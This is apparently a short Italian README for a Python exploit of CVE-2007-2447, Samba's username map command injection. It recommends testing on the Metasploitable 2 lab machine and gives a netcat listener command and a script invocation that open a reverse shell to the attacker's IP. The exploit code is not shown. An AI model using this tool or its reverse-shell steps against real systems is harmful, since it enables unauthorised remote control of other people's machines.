
Exploit Python per CVE-2007-2447 che attiva l'iniezione di comandi nello script di mappatura del nome utente di Samba per aprire una reverse shell su target vulnerabili.
Per testare lo script, ti consiglio la macchina virtuale "metasploitable 2" disponibile qui. Lo script mostrerà una reverse shell se l'exploit funziona. Per ottenere la connessione, basta aprire una sessione netcat come:
netcat -lnvp <port>
py CVE-2007-2447.py 192.168.1.38 1337 192.168.1.14
e sul mio netcat :
netcat -lnvp 1337
Risultato :
netcat :
alt text
e sullo script:
alt text
Ho usato un payload preso da un cheat-sheet. Il link è disponibile . Puoi sostituirlo con altri payload.